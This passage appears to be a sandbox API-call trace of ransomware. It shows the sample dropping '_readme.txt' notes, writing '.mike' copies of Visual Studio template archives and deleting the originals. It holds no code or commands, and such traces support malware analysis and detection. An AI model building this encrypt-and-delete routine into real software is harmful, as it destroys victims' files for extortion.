lpFileInformation=0x2af094*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0128.277] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip", nBufferLength=0x105, lpBuffer=0x2aeb94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip", lpFilePart=0x0) returned 0x6c [0128.277] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea54, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\_readme.txt", lpFilePart=0x0) returned 0x67 [0128.278] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\_readme.txt" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x288 [0128.278] GetFileType (hFile=0x288) returned 0x1 [0128.278] GetFileType (hFile=0x288) returned 0x1 [0128.279] WriteFile (in: hFile=0x288, lpBuffer=0x21cc078*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2aefe0, lpOverlapped=0x0 | out: lpBuffer=0x21cc078*, lpNumberOfBytesWritten=0x2aefe0*=0x45e, lpOverlapped=0x0) returned 1 [0128.279] CloseHandle (hObject=0x288) returned 1 [0128.279] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip", nBufferLength=0x105, lpBuffer=0x2aeb8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip", lpFilePart=0x0) returned 0x74 [0128.280] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip", lpFilePart=0x0) returned 0x74 [0128.280] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfointernal.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0128.281] GetFileType (hFile=0x288) returned 0x1 [0128.281] GetFileType (hFile=0x288) returned 0x1 [0128.281] CloseHandle (hObject=0x288) returned 1 [0128.281] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip", nBufferLength=0x105, lpBuffer=0x2aeb8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip", lpFilePart=0x0) returned 0x74 [0128.281] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip", nBufferLength=0x105, lpBuffer=0x2aebb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip", lpFilePart=0x0) returned 0x74 [0128.281] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeb3c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0128.281] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0128.282] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfointernal.zip"), fInfoLevelId=0x0, lpFileInformation=0x21ce214 | out: lpFileInformation=0x21ce214*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x10f5dcf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8c501900, ftLastWriteTime.dwHighDateTime=0x1c9e43c, nFileSizeHigh=0x0, nFileSizeLow=0x4e2)) returned 1 [0128.282] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip", nBufferLength=0x105, lpBuffer=0x2aebb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip", lpFilePart=0x0) returned 0x74 [0128.282] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfointernal.zip"), fInfoLevelId=0x0, lpFileInformation=0x21ce600 | out: lpFileInformation=0x21ce600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x10f5dcf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8c501900, ftLastWriteTime.dwHighDateTime=0x1c9e43c, nFileSizeHigh=0x0, nFileSizeLow=0x4e2)) returned 1 [0128.282] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip", nBufferLength=0x105, lpBuffer=0x2aeb94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip", lpFilePart=0x0) returned 0x74 [0128.282] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip.mike", lpFilePart=0x0) returned 0x79 [0128.283] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip.mike" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfointernal.zip.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af094 | out: lpFileInformation=0x2af094*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0128.283] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip", lpFilePart=0x0) returned 0x74 [0128.283] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip", lpFilePart=0x0) returned 0x74 [0128.283] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip", nBufferLength=0x105, lpBuffer=0x2aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip", lpFilePart=0x0) returned 0x74 [0128.283] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip.mike", nBufferLength=0x105, lpBuffer=0x2aeb20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip.mike", lpFilePart=0x0) returned 0x79 [0128.283] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip.mike" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfointernal.zip.mike"), fInfoLevelId=0x0, lpFileInformation=0x2aeffc | out: lpFileInformation=0x2aeffc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0128.283] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip.mike", nBufferLength=0x105, lpBuffer=0x2aea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip.mike", lpFilePart=0x0) returned 0x79 [0128.284] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip.mike" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfointernal.zip.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0128.285] GetFileType (hFile=0x288) returned 0x1 [0128.285] GetFileType (hFile=0x288) returned 0x1 [0128.285] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aeef0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aeef0*=0) returned 0x0 [0128.285] WriteFile (in: hFile=0x288, lpBuffer=0x21cf9e4*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2aef9c, lpOverlapped=0x0 | out: lpBuffer=0x21cf9e4*, lpNumberOfBytesWritten=0x2aef9c*=0x220, lpOverlapped=0x0) returned 1 [0128.286] CloseHandle (hObject=0x288) returned 1 [0128.286] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfointernal.zip"), fInfoLevelId=0x0, lpFileInformation=0x21cf3a8 | out: lpFileInformation=0x21cf3a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x10f5dcf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8c501900, ftLastWriteTime.dwHighDateTime=0x1c9e43c, nFileSizeHigh=0x0, nFileSizeLow=0x4e2)) returned 1 [0128.286] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip", nBufferLength=0x105, lpBuffer=0x2aea18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip", lpFilePart=0x0) returned 0x74 [0128.286] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfointernal.zip"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0128.287] GetFileType (hFile=0x288) returned 0x1 [0128.287] GetFileType (hFile=0x288) returned 0x1 [0128.287] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef9c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2aef9c*=0) returned 0x0 [0128.287] ReadFile (in: hFile=0x288, lpBuffer=0x21d0b84, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2aefa8, lpOverlapped=0x0 | out: lpBuffer=0x21d0b84*, lpNumberOfBytesRead=0x2aefa8*=0x4e2, lpOverlapped=0x0) returned 1 [0128.292] CloseHandle (hObject=0x288) returned 1 [0128.293] WriteFile (in: hFile=0x288, lpBuffer=0x21d8ac4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2aefcc, lpOverlapped=0x0 | out: lpBuffer=0x21d8ac4*, lpNumberOfBytesWritten=0x2aefcc*=0x20c, lpOverlapped=0x0) returned 1 [0128.294] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip.mike", lpFilePart=0x0) returned 0x79 [0128.294] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip.mike", lpFilePart=0x0) returned 0x79 [0128.294] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip", dwFileAttributes=0x80) returned 1 [0128.295] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfointernal.zip")) returned 1 [0128.296] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea54, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\_readme.txt", lpFilePart=0x0) returned 0x67 [0128.298] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0128.298] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Class.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Class.zip.mike", lpFilePart=0x0) returned 0x6a [0128.299] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Class.zip", nBufferLength=0x105, lpBuffer=0x2aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Class.zip", lpFilePart=0x0) returned 0x65 [0128.302] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Class.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Class.zip.mike", lpFilePart=0x0) returned 0x6a [0128.302] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Class.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Class.zip.mike", lpFilePart=0x0) returned 0x6a [0128.302] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Class.zip", dwFileAttributes=0x80) returned 1 [0128.303] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Class.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\class.zip")) returned 1 [0128.304] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea54, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\_readme.txt", lpFilePart=0x0) returned 0x67 [0128.322] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0128.322] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\CodeFile.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\CodeFile.zip.mike", lpFilePart=0x0) returned 0x6d [0128.323] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\CodeFile.zip", nBufferLength=0x105, lpBuffer=0x2aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\CodeFile.zip", lpFilePart=0x0) returned 0x68 [0128.326] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\CodeFile.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\CodeFile.zip.mike", lpFilePart=0x0) returned 0x6d [0128.326] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\CodeFile.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\CodeFile.zip.mike", lpFilePart=0x0) returned 0x6d [0128.326] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\CodeFile.zip", dwFileAttributes=0x80) returned 1 [0128.327] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\CodeFile.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\codefile.zip")) returned 1 [0128.328] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea54, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\_readme.txt", lpFilePart=0x0) returned 0x67 [0128.330] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0128.330] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\DataSet.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\DataSet.zip.mike", lpFilePart=0x0) returned 0x6c [0128.331] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\DataSet.zip", nBufferLength=0x105, lpBuffer=0x2aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\DataSet.zip", lpFilePart=0x0) returned 0x67 [0128.335] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\DataSet.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\DataSet.zip.mike", lpFilePart=0x0) returned 0x6c [0128.335] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\DataSet.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\DataSet.zip.mike", lpFilePart=0x0) returned 0x6c [0128.335] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\DataSet.zip", dwFileAttributes=0x80) returned 1 [0128.336] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\DataSet.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\dataset.zip")) returned 1 [0128.337] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea54, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\_readme.txt", lpFilePart=0x0) returned 0x67 [0128.345] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0128.345] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\EmptyDatabase.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\EmptyDatabase.zip.mike", lpFilePart=0x0) returned 0x72 [0128.345] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 